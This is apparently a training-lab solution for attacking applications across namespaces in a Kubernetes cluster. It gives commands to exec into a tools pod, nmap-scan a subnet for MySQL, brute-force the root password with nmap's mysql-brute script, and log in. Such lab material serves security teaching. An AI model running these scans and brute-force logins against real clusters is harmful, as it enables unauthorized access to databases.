Attacking applications in different namespaces in Kubernetes cluster - Solution

  • Get pod details and login to the net-tools pod using below command.
export NET_TOOLS_POD=$(kubectl get pods --selector app=net-tools -o jsonpath="{.items[0].metadata.name}")
kubectl exec -it $NET_TOOLS_POD bash

  • As MySQL runs on port 3306 by default, we can scan the IP range for this port
nmap -n -Pn -p3306 --open -sS -T5 10.36.4.0/24

  • Once we have discovered the MySQL service, we can brute force the credentials to login into the server. We can run a brute force attack using nmap and its scripting engine.
echo root > users.txt
nmap --script mysql-brute 10.36.4.30 -p3306 -T4 --script-args "userdb=users.txt"

  • Once the credentials are discovered, we can access the MySQL instance with obtained password within the cluster network in different namespace
mysql -u root -psecret -h 10.36.4.30

  • Verify the pods, svc available in the database namespace
kubectl get ns
kubectl get all -n database

Refernces